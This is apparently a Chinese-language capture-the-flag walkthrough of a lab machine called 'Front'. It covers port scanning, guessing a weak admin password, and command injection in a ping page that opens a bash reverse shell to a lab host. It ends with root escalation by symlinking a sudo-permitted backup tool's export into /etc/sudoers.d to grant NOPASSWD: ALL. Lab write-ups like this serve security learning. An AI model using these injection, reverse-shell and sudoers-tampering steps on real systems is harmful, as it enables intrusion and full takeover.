本文最后更新于2 天前,其中的信息可能已经过时,如有错误请发送邮件到
matter_lmoon5731@outlook.com
[MazeSec | Home] front靶机复现
社区 [MazeSec | Home] 社区群 321948805
靶机:Front
作者:群主
靶机ID: 739
系统:Linux
难度:Easy
信息搜集
ip:192.168.56.13
使用nmap扫描查看开放的端口
nmap -sV -p- 192.168.56.13

user
得到三个开放的端口,然后访问8080端口,得到如下

注册账号
用户名1
密码1

可以发现在队列的第一个的用户名是admin,然后接下来的思路就是尝试进行弱口令爆破查看是否可以进行登录进去,然后得到admin123的回显不是账号密码错误,所以得到其密码

然后登录进去,发现有一个权限申请页面进入,得到一个ping的页面,尝试之后发现可以进行命令组合执行

然后对其进行尝试反弹shell,方便后续的分析
127.0.0.1;bash -c 'bash -i >& /dev/tcp/192.168.56.11/4444 0>&1'
反弹成功获取user.txt里面的userflag

root
查看一下当前权限有没有免密的提示,得到
sudo -l

(root) NOPASSWD: /usr/bin/back
上面的ALL是我复现的结果,源靶机里面没有,然后运行/usr/bin/back得到一些用法

由于前上一次的靶机中也有类似的思路就是利用软链接将权限写入/etc/sudoers.d/pms里面然后进行全用户无密码状态
先进行add添加我们的指令
n\nALL ALL=(ALL) NOPASSWD: ALL
这里的换行符可以被进行解析然后结果就是使n\nALL ALL=(ALL) NOPASSWD: ALL单独一行使其命令可以生效
接下来就是对其进行软链接导入,创建软连接的文件必须不存在否则无法进行创建
ln -s /etc/sudoers.d/pms /home/s3cti0n/c.log
然后将记录导出到/home/s3cti0n/c.log中
back export#/home/s3cti0n/c.log
然后机会得到
(ALL) NOPASSWD: ALL

然后进入shell,查看flag
sudo -i











